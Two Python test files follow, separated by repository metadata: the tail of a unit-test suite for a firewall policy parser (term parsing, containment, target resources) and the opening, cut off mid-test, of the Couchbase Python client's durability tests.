self.assertEqual(['fritzy'], pol.filters[0][1][0].forwarding_class)
def testMultipleForwardingClassPolicy(self):
pol = policy.ParsePolicy(HEADER + GOOD_TERM_36, self.naming)
self.assertEqual(
['flashy', 'fritzy'], pol.filters[0][1][0].forwarding_class
)
def testForwardingClassEqual(self):
pol_text = HEADER + GOOD_TERM_32 + GOOD_TERM_33
ret = policy.ParsePolicy(pol_text, self.naming, shade_check=False)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(len(terms), 2)
self.assertNotEqual(terms[0], terms[1])
def testTagSupportAndNetworkHeaderParsing(self):
pol = policy.ParsePolicy(HEADER_5 + GOOD_TERM_34, self.naming)
self.assertEqual(len(pol.filters), 1)
header, terms = pol.filters[0]
self.assertEqual(str(header.target[0]), 'gce')
self.assertEqual(header.FilterOptions('gce'), ['global/networks/default'])
self.assertEqual(terms[0].source_tag, ['src-tag'])
self.assertEqual(terms[0].destination_tag, ['dest-tag'])
def testEq(self):
"""Sanity test to verify __eq__ works on Policy objects."""
policy1 = policy.ParsePolicy(HEADER_4 + GOOD_TERM_30, self.naming)
policy2 = policy.ParsePolicy(HEADER_4 + GOOD_TERM_30, self.naming)
policy3 = policy.ParsePolicy(HEADER_5 + GOOD_TERM_34, self.naming)
self.assertEqual(policy1, policy2)
self.assertNotEqual(policy1, policy3)
self.assertNotEqual(policy2, policy3)
def testNextIP(self):
pol = HEADER_2 + GOOD_TERM_35
expected = nacaddr.IPv4('10.1.1.1/32')
self.naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.1.1.1/32')],
]
result = policy.ParsePolicy(pol, self.naming)
self.assertEqual(result.filters[0][1][0].next_ip[0], expected)
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('NEXT_IP')]
)
def testStr(self):
"""Sanity test to verify __eq__ works on Policy objects."""
pol = policy.ParsePolicy(HEADER_4 + GOOD_TERM_30, self.naming)
logging.info("Ensuring string formatting doesn't throw errors: %s", pol)
def testTermAddressByteLength(self):
"""Tests the AddressByteLength function."""
pol = HEADER + GOOD_TERM_2
self.naming.GetNetAddr.return_value = [
nacaddr.IPv4('10.0.0.1/32'),
nacaddr.IPv4('10.0.0.2/32'),
nacaddr.IPv6('2001:4860:4860::8844/128'),
nacaddr.IPv6('2001:4860:4860::8888/128'),
]
ret = policy.ParsePolicy(pol, self.naming)
term = ret.filters[0][1][0]
self.assertEqual(2, term.AddressesByteLength([4]))
self.assertEqual(8, term.AddressesByteLength([6]))
self.assertEqual(10, term.AddressesByteLength())
# pylint: enable=maybe-no-member
def testICMPCodes(self):
pol = HEADER + GOOD_TERM_42
result = policy.ParsePolicy(pol, self.naming)
self.assertIn('icmp_code: [3, 4]', str(result))
def testBadICMPCodes(self):
pol = HEADER + BAD_TERM_13
pol2 = HEADER + BAD_TERM_14
self.assertRaises(
policy.ICMPCodeError, policy.ParsePolicy, pol, self.naming
)
self.assertRaises(
policy.ICMPCodeError, policy.ParsePolicy, pol2, self.naming
)
def testOptimizedConsistency(self):
pol = HEADER + GOOD_TERM_2 + GOOD_TERM_3
unoptimized_addr = [
nacaddr.IPv4('10.16.128.6/32'),
nacaddr.IPv4('10.16.128.7/32'),
]
optimized_addr = nacaddr.CollapseAddrList(unoptimized_addr)
self.naming.GetNetAddr.return_value = unoptimized_addr
self.naming.GetServiceByProto.return_value = ['25']
ret_unoptimized = policy.ParsePolicy(pol, self.naming, optimize=False)
self.assertFalse(policy._OPTIMIZE)
ret_optimized = policy.ParsePolicy(pol, self.naming)
self.assertTrue(policy._OPTIMIZE)
for _, terms in ret_unoptimized.filters:
for term in terms:
self.assertEqual(unoptimized_addr, term.source_address)
for _, terms in ret_optimized.filters:
for term in terms:
self.assertEqual(optimized_addr, term.source_address)
def testShadeCheckConsistency(self):
pol = HEADER + TERM_SUPER_3 + TERM_SUB_2
self.assertRaises(
policy.ShadingError,
policy.ParsePolicy,
pol,
self.naming,
shade_check=True,
)
self.assertTrue(policy._SHADE_CHECK)
_ = policy.ParsePolicy(pol, self.naming)
self.assertFalse(policy._SHADE_CHECK)
def testEncapsulate(self):
pol = HEADER + GOOD_TERM_46
result = policy.ParsePolicy(pol, self.naming)
self.assertIn('encapsulate: stuff_and_things', str(result))
def testDecapsulate(self):
pol = HEADER + GOOD_TERM_49
result = policy.ParsePolicy(pol, self.naming)
self.assertIn('decapsulate: mpls-in-udp', str(result))
def testPortMirror(self):
pol = HEADER + GOOD_TERM_47
result = policy.ParsePolicy(pol, self.naming)
self.assertIn('port_mirror: true', str(result))
  def testSrxGlobalZone(self):
pol = HEADER + GOOD_TERM_48
result = policy.ParsePolicy(pol, self.naming)
zones = ['zone1', 'zone2']
expected_source = 'source_zone: %s' % zones
expected_destination = 'destination_zone: %s' % zones
self.assertIn(expected_source, str(result))
self.assertIn(expected_destination, str(result))
def testTTL(self):
pol = HEADER + GOOD_TERM_43
result = policy.ParsePolicy(pol, self.naming)
self.assertIn('ttl: 10', str(result))
def testInvalidTTL(self):
pol = HEADER + BAD_TERM_15
self.assertRaises(
policy.InvalidTermTTLValue, policy.ParsePolicy, pol, self.naming
)
def testNeedAddressBook(self):
pol1 = policy.ParsePolicy(HEADER + GOOD_TERM_1, self.naming)
pol2 = policy.ParsePolicy(HEADER_SRX + GOOD_TERM_1, self.naming)
pol3 = policy.ParsePolicy(HEADER_OBJ_GRP + GOOD_TERM_1, self.naming)
pol4 = policy.ParsePolicy(HEADER_ADDRBOOK_MIXED + GOOD_TERM_1, self.naming)
self.assertFalse(pol1._NeedsAddressBook())
self.assertTrue(pol2._NeedsAddressBook())
self.assertTrue(pol3._NeedsAddressBook())
self.assertTrue(pol4._NeedsAddressBook())
def testAddressCleanupCorrect(self):
unoptimized_addr = [
nacaddr.IPv4('10.16.128.6/32', token='FOO'),
nacaddr.IPv4('10.16.128.7/32', token='BAR'),
]
self.naming.GetNetAddr.return_value = unoptimized_addr
pol = policy.ParsePolicy(HEADER + GOOD_TERM_2, self.naming)
term = pol.filters[0][1][0]
self.assertEqual(
nacaddr.CollapseAddrList(unoptimized_addr), term.source_address
)
pol = policy.ParsePolicy(HEADER_SRX + GOOD_TERM_2, self.naming)
term = pol.filters[0][1][0]
self.assertEqual(
nacaddr.CollapseAddrListPreserveTokens(unoptimized_addr),
term.source_address,
)
def testLogLimit(self):
pol = policy.ParsePolicy(HEADER_4 + GOOD_TERM_44, self.naming)
term = pol.filters[0][1][0]
self.assertEqual(('999', 'day'), term.log_limit)
def testGREandTCPUDPError(self):
pol = HEADER + BAD_TERM_16
self.naming.GetServiceByProto.return_value = ['25']
self.assertRaises(
policy.MixedPortandNonPortProtos, policy.ParsePolicy, pol, self.naming
)
def testSourceServiceAccount(self):
pol = HEADER_HF_1 + GOOD_TERM_50
result = policy.ParsePolicy(pol, self.naming)
term = result.filters[0][1][0]
self.assertEqual(['acct1@blah.com'], term.source_service_accounts)
def testTargetServiceAccount(self):
pol = HEADER_HF_1 + GOOD_TERM_45
result = policy.ParsePolicy(pol, self.naming)
term = result.filters[0][1][0]
self.assertEqual(['acct1@blah.com'], term.target_service_accounts)
# Contains Tests
def testVerbatimContains(self):
term_one = policy.Term(policy.VarType(23, ('iptables', 'foo')))
term_two = policy.Term(policy.VarType(23, ('iptables', 'bar')))
term_three = policy.Term(policy.VarType(23, ('juniper', 'foo')))
self.assertIn(term_one, term_one)
self.assertNotIn(term_two, term_one)
self.assertNotIn(term_three, term_one)
@mock.patch.object(policy, 'DEFINITIONS')
def testIpAndPortContains(self, mock_naming):
mock_naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.1.1.1/32')],
]
term_one = policy.Term([
policy.VarType(3, 'PROD'),
policy.VarType(7, (22, 22)),
policy.VarType(7, (80, 80)),
policy.VarType(10, 'tcp'),
])
term_one.AddObject(policy.VarType(2, 'accept'))
term_two = policy.Term([
policy.VarType(3, 'SMALLER_PROD'),
policy.VarType(7, (22, 22)),
policy.VarType(10, 'tcp'),
])
term_two.AddObject(policy.VarType(2, 'accept'))
self.assertIn(term_two, term_one)
self.assertNotIn(term_one, term_two)
@mock.patch.object(policy, 'DEFINITIONS')
def testEmptyIpContains(self, mock_naming):
    # This differs from the IP-and-port case above in that the containing
    # term only defines an address. It's meant to catch the case where
    # the containing term has less detail (and is hence less restrictive)
    # than the contained term.
mock_naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.1.1.1/32')],
]
term_one = policy.Term([policy.VarType(5, 'PROD')])
term_one.AddObject(policy.VarType(2, 'accept'))
term_two = policy.Term(
[policy.VarType(3, 'SMALLER_PROD'), policy.VarType(7, (22, 22))]
)
term_two.AddObject(policy.VarType(2, 'accept'))
self.assertIn(term_two, term_one)
self.assertNotIn(term_one, term_two)
@mock.patch.object(policy, 'DEFINITIONS')
def testIpExcludeContains(self, mock_naming):
# This 'contains' test kicks the tires on source-address and
# source-address-exclude.
mock_naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.62.0.0/15')],
]
term_one = policy.Term([policy.VarType(3, 'FOO')])
term_two = policy.Term(
[policy.VarType(3, 'FOO'), policy.VarType(11, 'BAR')]
)
self.assertIn(term_two, term_one)
self.assertNotIn(term_one, term_two)
@mock.patch.object(policy, 'DEFINITIONS')
def testIpDualExcludeContains(self, mock_naming):
    # One term has (10.0.0.0/8, except 10.10.0.0/24); it should contain a term
    # that has (10.0.0.0/8, except 10.0.0.0/9).
mock_naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.10.0.0/24')],
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.0.0.0/9')],
]
term_one = policy.Term(
[policy.VarType(3, 'FOO'), policy.VarType(11, 'BAR')]
)
term_two = policy.Term(
[policy.VarType(3, 'FOO'), policy.VarType(11, 'BAR')]
)
self.assertIn(term_two, term_one)
self.assertNotIn(term_one, term_two)
def testOptionsContains(self):
    # Tests 'contains' handling of the options field. A term with options set
    # and one without do not contain each other; a term whose options are a
    # subset of another's is contained by it.
tcp_est_term = policy.Term([policy.VarType(9, 'tcp-established')])
term = policy.Term([])
tcp_udp_est_term = policy.Term(
[policy.VarType(9, 'tcp-established'), policy.VarType(9, 'established')]
)
self.assertNotIn(term, tcp_est_term)
self.assertNotIn(tcp_est_term, term)
self.assertIn(tcp_est_term, tcp_udp_est_term)
self.assertNotIn(tcp_udp_est_term, tcp_est_term)
def testPrecedenceContains(self):
    # Tests 'contains' handling of the precedence field. A term with
    # precedence set and one without do not contain each other.
p_term = policy.Term([policy.VarType(26, 1)])
no_p_term = policy.Term([])
self.assertIn(p_term, p_term)
self.assertIn(no_p_term, no_p_term)
self.assertNotIn(no_p_term, p_term)
self.assertNotIn(p_term, no_p_term)
def testProtocolExceptContains(self):
# Test the protocol-except keyword.
pexcept_term = policy.Term([policy.VarType(8, 'tcp')])
    pexcept_term_udp = policy.Term([policy.VarType(8, 'udp')])
p_term = policy.Term([policy.VarType(10, 'icmp')])
p_term_tcp = policy.Term([policy.VarType(10, 'tcp')])
self.assertIn(p_term, pexcept_term)
self.assertIn(pexcept_term, pexcept_term)
self.assertNotIn(p_term_tcp, pexcept_term)
    self.assertNotIn(pexcept_term_udp, pexcept_term)
def testProtocolTermNotInAnotherTermContains(self):
term_one = policy.Term([policy.VarType(10, 'tcp')])
term_two = policy.Term([policy.VarType(10, 'udp')])
self.assertNotIn(term_one, term_two)
def testTargetServiceAccountContains(self):
two_target_sa = ['acct1@blah.com', 'acct2@blah.com']
one_target_sa = ['acct3@blah.com']
term = policy.Term([policy.VarType(60, two_target_sa)])
self.assertIn(two_target_sa, term.target_service_accounts)
term.AddObject(policy.VarType(60, one_target_sa))
self.assertIn(one_target_sa, term.target_service_accounts)
def testProtoExceptNotInEmptyTerm(self):
term_one = policy.Term([policy.VarType(8, 'tcp')])
term_two = policy.Term([])
self.assertNotIn(term_two, term_one)
def testProtocolNotInProtoExcept(self):
term_one = policy.Term([policy.VarType(8, 'tcp')])
term_two = policy.Term([policy.VarType(10, 'udp')])
self.assertNotIn(term_one, term_two)
def testProtocolNotInEmptyTerm(self):
term_one = policy.Term([policy.VarType(10, 'tcp')])
term_two = policy.Term([])
self.assertNotIn(term_two, term_one)
@mock.patch.object(policy, 'DEFINITIONS')
def testAddrNotInAddr(self, mock_naming):
mock_naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('192.168.1.1/32')],
[nacaddr.IPv4('10.1.1.0/24')],
[nacaddr.IPv4('10.1.1.0/24')],
[nacaddr.IPv4('10.1.1.0/24')],
]
term = policy.Term([policy.VarType(5, 'FOO')])
addr_term = policy.Term([policy.VarType(5, 'FOO')])
saddr_term = policy.Term([policy.VarType(3, 'FOO')])
daddr_term = policy.Term([policy.VarType(4, 'FOO')])
self.assertNotIn(addr_term, term)
self.assertNotIn(saddr_term, term)
self.assertNotIn(daddr_term, term)
@mock.patch.object(policy, 'DEFINITIONS')
def testDestAddrNotInDestAddr(self, mock_naming):
mock_naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('192.168.1.1/32')],
[nacaddr.IPv4('10.1.1.0/24')],
]
term_one = policy.Term([policy.VarType(4, 'FOO')])
term_two = policy.Term([policy.VarType(4, 'FOO')])
self.assertNotIn(term_one, term_two)
def testSourcePortNotInSourcePort(self):
term_one = policy.Term([policy.VarType(6, (22, 22))])
term_two = policy.Term([policy.VarType(6, (23, 23))])
self.assertNotIn(term_one, term_two)
def testDestinationPortNotInDestinationPort(self):
term_one = policy.Term([policy.VarType(7, (22, 22))])
term_two = policy.Term([policy.VarType(7, (23, 23))])
self.assertNotIn(term_one, term_two)
def testSourcePrefixContains(self):
term_one = policy.Term([policy.VarType(19, 'foo')])
self.assertIn(term_one, term_one)
def testSourcePrefixNotInSourcePrefix(self):
term_one = policy.Term([policy.VarType(19, 'foo')])
term_two = policy.Term([policy.VarType(19, 'bar')])
self.assertNotIn(term_one, term_two)
def testDestinationPrefixContains(self):
term_one = policy.Term([policy.VarType(20, 'foo')])
self.assertIn(term_one, term_one)
def testDestinationPrefixNotInDestinationPrefix(self):
term_one = policy.Term([policy.VarType(20, 'foo')])
term_two = policy.Term([policy.VarType(20, 'bar')])
self.assertNotIn(term_one, term_two)
def testSourcePrefixExceptContains(self):
term_one = policy.Term([policy.VarType(50, 'foo')])
self.assertIn(term_one, term_one)
def testSourcePrefixExceptNotInSourcePrefixExcept(self):
term_one = policy.Term([policy.VarType(50, 'foo')])
term_two = policy.Term([policy.VarType(50, 'bar')])
self.assertNotIn(term_one, term_two)
def testDestinationPrefixExceptContains(self):
term_one = policy.Term([policy.VarType(51, 'foo')])
self.assertIn(term_one, term_one)
def testDestinationPrefixExceptNotInDestinationPrefixExcept(self):
term_one = policy.Term([policy.VarType(51, 'foo')])
term_two = policy.Term([policy.VarType(51, 'bar')])
self.assertNotIn(term_one, term_two)
def testSourceTagContains(self):
term_one = policy.Term([policy.VarType(44, 'foo')])
self.assertIn(term_one, term_one)
def testSourceTagNotInSourceTag(self):
term_one = policy.Term([policy.VarType(44, 'foo')])
term_two = policy.Term([policy.VarType(44, 'bar')])
self.assertNotIn(term_one, term_two)
def testForwardingClassContains(self):
term_one = policy.Term([policy.VarType(43, 'foo')])
term_two = policy.Term(
[policy.VarType(43, 'bar'), policy.VarType(43, 'foo')]
)
self.assertIn(term_one, term_one)
self.assertIn(term_one, term_two)
def testForwardingClassNotIn(self):
term_one = policy.Term([policy.VarType(43, 'foo')])
term_two = policy.Term([policy.VarType(43, 'bar')])
term_three = policy.Term([])
self.assertNotIn(term_one, term_two)
self.assertNotIn(term_three, term_one)
def testForwardingClassExceptContains(self):
term_one = policy.Term([policy.VarType(52, 'foo')])
self.assertIn(term_one, term_one)
def testForwardingClassExceptNotIn(self):
term_one = policy.Term([policy.VarType(52, 'foo')])
term_two = policy.Term([policy.VarType(52, 'bar')])
term_three = policy.Term([])
self.assertNotIn(term_one, term_two)
self.assertNotIn(term_three, term_one)
@mock.patch.object(policy, 'DEFINITIONS')
def testNextIPContained(self, mock_naming):
mock_naming.GetNetAddr.side_effect = [[nacaddr.IPv4('192.168.1.1/32')]]
term_one = policy.Term([policy.VarType(46, 'FOO')])
self.assertIn(term_one, term_one)
@mock.patch.object(policy, 'DEFINITIONS')
def testNextIPNotIn(self, mock_naming):
mock_naming.GetNetAddr.side_effect = [[nacaddr.IPv4('192.168.1.1/32')]]
term_one = policy.Term([policy.VarType(46, 'FOO')])
term_two = policy.Term([])
self.assertNotIn(term_two, term_one)
def testPortContains(self):
# Test 'contains' against port field and that it matches
# source/destination/port fields.
port_term = policy.Term([policy.VarType(32, (25, 25))])
sport_term = policy.Term([policy.VarType(6, (25, 25))])
dport_term = policy.Term([policy.VarType(7, (25, 25))])
self.assertIn(sport_term, port_term)
self.assertIn(dport_term, port_term)
self.assertIn(port_term, port_term)
alt_port_term = policy.Term([policy.VarType(32, (25, 30))])
sport_term = policy.Term([policy.VarType(6, (25, 30))])
dport_term = policy.Term([policy.VarType(7, (25, 30))])
self.assertNotIn(alt_port_term, port_term)
self.assertNotIn(sport_term, port_term)
self.assertNotIn(dport_term, port_term)
def testFragmentOffset(self):
fo_term = policy.Term([])
fo_term.AddObject(policy.VarType(17, '80'))
fo_range_term = policy.Term([])
fo_range_term.AddObject(policy.VarType(17, '60-90'))
fo_smaller_range_term = policy.Term([])
fo_smaller_range_term.AddObject(policy.VarType(17, '65-82'))
term = policy.Term([])
self.assertIn(fo_term, fo_term)
self.assertIn(fo_term, fo_range_term)
self.assertNotIn(fo_range_term, fo_term)
self.assertIn(fo_smaller_range_term, fo_range_term)
self.assertNotIn(fo_range_term, fo_smaller_range_term)
self.assertNotIn(term, fo_term)
def testTermTargetResources(self):
target_resources = [('p1', 'v1'), ('p2', 'v2')]
target_resource_2 = [('p3', 'v3')]
term_one = policy.Term(
[policy.VarType(policy.VarType.TARGET_RESOURCES, target_resources)]
)
term_one.AddObject(policy.VarType(59, target_resource_2))
self.assertIn(target_resources, term_one.target_resources)
self.assertIn(target_resource_2, term_one.target_resources)
def testParsePolicySingleTargetResources(self):
good_term_target_resources = """
term target-resource-term {
action:: deny
target-resources:: (proj1,vpc1)
}"""
pol = HEADER_HF_1 + good_term_target_resources
p = policy.ParsePolicy(pol, self.naming)
self.assertIsInstance(p, policy.Policy)
_, terms = p.filters[0]
self.assertIn('deny', terms[0].action)
self.assertIn(('proj1', 'vpc1'), terms[0].target_resources)
def testParsePolicyMultipleTargetResources(self):
good_term_target_resources = """
term target-resource-term {
action:: deny
target-resources:: (proj1,vpc1)
target-resources:: (proj2,vpc2)
target-resources:: (proj3,vpc3)
target-resources:: (proj4,vpc4)
}"""
pol = HEADER_HF_1 + good_term_target_resources
p = policy.ParsePolicy(pol, self.naming)
self.assertIsInstance(p, policy.Policy)
_, terms = p.filters[0]
self.assertIn('deny', terms[0].action)
expected_target_resources = [
('proj1', 'vpc1'),
('proj2', 'vpc2'),
('proj3', 'vpc3'),
('proj4', 'vpc4'),
]
self.assertListEqual(expected_target_resources, terms[0].target_resources)
def testParsePolicyMultipleCommaSepTargetResources(self):
good_term_target_resources = """
term target-resource-term {
action:: deny
target-resources:: (proj1,vpc1),(proj2,vpc2),(proj3,vpc3),(proj4,vpc4)
}"""
pol = HEADER_HF_1 + good_term_target_resources
p = policy.ParsePolicy(pol, self.naming)
self.assertIsInstance(p, policy.Policy)
_, terms = p.filters[0]
self.assertIn('deny', terms[0].action)
expected_target_resources = [
('proj1', 'vpc1'),
('proj2', 'vpc2'),
('proj3', 'vpc3'),
('proj4', 'vpc4'),
]
self.assertListEqual(expected_target_resources, terms[0].target_resources)
def testParsePolicyMultipleSpaceSepTargetResources(self):
good_term_target_resources = """
term target-resource-term {
action:: deny
target-resources:: (proj1,vpc1) (proj2,vpc2) (proj3,vpc3) (proj4,vpc4)
}"""
pol = HEADER_HF_1 + good_term_target_resources
p = policy.ParsePolicy(pol, self.naming)
self.assertIsInstance(p, policy.Policy)
_, terms = p.filters[0]
self.assertIn('deny', terms[0].action)
expected_target_resources = [
('proj1', 'vpc1'),
('proj2', 'vpc2'),
('proj3', 'vpc3'),
('proj4', 'vpc4'),
]
self.assertListEqual(expected_target_resources, terms[0].target_resources)
def testParsePolicyMultipleArrayCommaTargetResources(self):
good_term_target_resources = """
term target-resource-term {
action:: deny
target-resources:: [(proj1,vpc1),(proj2,vpc2),(proj3,vpc3),(proj4,vpc4)]
}"""
pol = HEADER_HF_1 + good_term_target_resources
p = policy.ParsePolicy(pol, self.naming)
self.assertIsInstance(p, policy.Policy)
_, terms = p.filters[0]
self.assertIn('deny', terms[0].action)
expected_target_resources = [
('proj1', 'vpc1'),
('proj2', 'vpc2'),
('proj3', 'vpc3'),
('proj4', 'vpc4'),
]
self.assertListEqual(expected_target_resources, terms[0].target_resources)
def testParsePolicyMultipleArraySpaceTargetResources(self):
good_term_target_resources = """
term target-resource-term {
action:: deny
target-resources:: [(proj1,vpc1) (proj2,vpc2) (proj3,vpc3) (proj4,vpc4)]
}"""
pol = HEADER_HF_1 + good_term_target_resources
p = policy.ParsePolicy(pol, self.naming)
self.assertIsInstance(p, policy.Policy)
_, terms = p.filters[0]
self.assertIn('deny', terms[0].action)
expected_target_resources = [
('proj1', 'vpc1'),
('proj2', 'vpc2'),
('proj3', 'vpc3'),
('proj4', 'vpc4'),
]
self.assertListEqual(expected_target_resources, terms[0].target_resources)
if __name__ == '__main__':
absltest.main()
|
c6a7c4957faf81805a20631a62743928e06ad448
|
7e1c4dd6a2cae0597b4f4e961063cf077acdfd4c
|
/couchbase/tests/durability_t.py
|
61ed4c43959f463b9ab28fcfbc8fd3e71c11065f
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
couchbase/couchbase-python-client
|
753fa434db910d175bf9ea53a5829a40ba36e938
|
c7d80434be3f917d6f25439a918aed30273f63f4
|
refs/heads/master
| 2023-08-29T14:04:13.532717
| 2023-08-24T22:53:30
| 2023-08-25T03:35:21
| 2,122,194
| 223
| 87
|
Apache-2.0
| 2023-05-30T16:05:59
| 2011-07-29T04:24:46
|
Python
|
UTF-8
|
Python
| false
| false
| 18,602
|
py
|
durability_t.py
|
# Copyright 2016-2023. Couchbase, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import timedelta
import pytest
import couchbase.subdocument as SD
from couchbase.durability import (ClientDurability,
DurabilityLevel,
PersistTo,
PersistToExtended,
ReplicateTo,
ServerDurability)
from couchbase.exceptions import DocumentNotFoundException, DurabilityImpossibleException
from couchbase.options import (InsertOptions,
MutateInOptions,
RemoveOptions,
ReplaceOptions,
UpsertOptions)
from tests.environments import CollectionType
from tests.environments.test_environment import TestEnvironment
from tests.test_features import EnvironmentFeatures
class DurabilityTestSuite:
TEST_MANIFEST = [
'test_client_durable_insert',
'test_client_durable_insert_fail',
'test_client_durable_mutate_in',
'test_client_durable_mutate_in_fail',
'test_client_durable_remove',
'test_client_durable_remove_fail',
'test_client_durable_replace',
'test_client_durable_replace_fail',
'test_client_durable_upsert',
'test_client_durable_upsert_fail',
'test_client_durable_upsert_single_node',
'test_client_persist_to_extended',
'test_server_durable_insert',
'test_server_durable_insert_single_node',
'test_server_durable_mutate_in',
'test_server_durable_mutate_in_single_node',
'test_server_durable_remove',
'test_server_durable_remove_single_node',
'test_server_durable_replace',
'test_server_durable_replace_single_node',
'test_server_durable_upsert',
'test_server_durable_upsert_single_node',
]
@pytest.fixture(scope='class')
def check_has_replicas(self, num_replicas):
if num_replicas == 0:
pytest.skip('No replicas to test durability.')
@pytest.fixture(scope='class')
def check_multi_node(self, num_nodes):
if num_nodes == 1:
pytest.skip('Test only for clusters with more than a single node.')
@pytest.fixture(scope='class')
def check_single_node(self, num_nodes):
if num_nodes != 1:
pytest.skip('Test only for clusters with a single node.')
@pytest.fixture(scope='class')
def check_sync_durability_supported(self, cb_env):
EnvironmentFeatures.check_if_feature_supported('sync_durability',
cb_env.server_version_short,
cb_env.mock_server_type)
@pytest.fixture(scope='class')
def num_replicas(self, cb_env):
bucket_settings = TestEnvironment.try_n_times(10, 1, cb_env.bm.get_bucket, cb_env.bucket.name)
num_replicas = bucket_settings.get("num_replicas")
return num_replicas
@pytest.fixture(scope='class')
def num_nodes(self, cb_env):
return len(cb_env.cluster._cluster_info.nodes)
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_insert(self, cb_env, num_replicas):
key, value = cb_env.get_new_doc()
durability = ClientDurability(
persist_to=PersistTo.ONE, replicate_to=ReplicateTo(num_replicas))
cb_env.collection.insert(key, value, InsertOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_insert_fail(self, cb_env, num_replicas):
if num_replicas > 2:
pytest.skip('Too many replicas enabled.')
key, value = cb_env.get_new_doc()
durability = ClientDurability(
persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.insert(key, value, InsertOptions(durability=durability))
# @TODO: why DurabilityImpossibleException not raised?
# @pytest.mark.usefixtures('check_multi_node')
# @pytest.mark.usefixtures('check_has_replicas')
# def test_client_durable_insert_single_node(self, cb_env, num_replicas):
# key, value = cb_env.get_new_doc()
# durability = ClientDurability(
# persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
# with pytest.raises(DurabilityImpossibleException):
# cb_env.collection.insert(key, value, InsertOptions(durability=durability))
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_mutate_in(self, cb_env, num_replicas):
key, value = cb_env.get_existing_doc()
value['make'] = 'New Make'
value['model'] = 'New Model'
durability = ClientDurability(
persist_to=PersistTo.ONE, replicate_to=ReplicateTo(num_replicas))
cb_env.collection.mutate_in(key,
(SD.upsert('make', 'New Make'), SD.replace('model', 'New Model')),
MutateInOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_mutate_in_fail(self, cb_env, num_replicas):
if num_replicas > 2:
pytest.skip('Too many replicas enabled.')
key = cb_env.get_existing_doc(key_only=True)
durability = ClientDurability(
persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.mutate_in(key, (SD.upsert('make', 'New Make'),), MutateInOptions(durability=durability))
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_remove(self, cb_env, num_replicas):
key = cb_env.get_existing_doc(key_only=True)
durability = ClientDurability(persist_to=PersistTo.ONE, replicate_to=ReplicateTo(num_replicas))
cb_env.collection.remove(key, RemoveOptions(durability=durability))
with pytest.raises(DocumentNotFoundException):
cb_env.collection.get(key)
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_remove_fail(self, cb_env, num_replicas):
if num_replicas > 2:
pytest.skip("Too many replicas enabled.")
key = cb_env.get_existing_doc(key_only=True)
durability = ClientDurability(
persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.remove(key, RemoveOptions(durability=durability))
# @TODO: why DurabilityImpossibleException not raised?
# @pytest.mark.usefixtures('check_multi_node')
# @pytest.mark.usefixtures('check_has_replicas')
# def test_client_durable_remove_single_node(self, cb_env, num_replicas):
# key = cb_env.get_existing_doc(key_only=True)
# durability = ClientDurability(
# persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
# with pytest.raises(DurabilityImpossibleException):
# cb_env.collection.remove(key, RemoveOptions(durability=durability))
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_replace(self, cb_env, num_replicas):
key, value = cb_env.get_existing_doc()
durability = ClientDurability(
persist_to=PersistTo.ONE, replicate_to=ReplicateTo(num_replicas))
cb_env.collection.replace(key, value, ReplaceOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_replace_fail(self, cb_env, num_replicas):
if num_replicas > 2:
pytest.skip("Too many replicas enabled.")
key, value = cb_env.get_existing_doc()
durability = ClientDurability(
persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.replace(key, value, ReplaceOptions(durability=durability))
# @TODO: why DurabilityImpossibleException not raised?
# @pytest.mark.usefixtures('check_multi_node')
# @pytest.mark.usefixtures('check_has_replicas')
# def test_client_durable_replace_single_node(self, cb_env, num_replicas):
# key, value = cb_env.get_existing_doc()
# durability = ClientDurability(
# persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
# with pytest.raises(DurabilityImpossibleException):
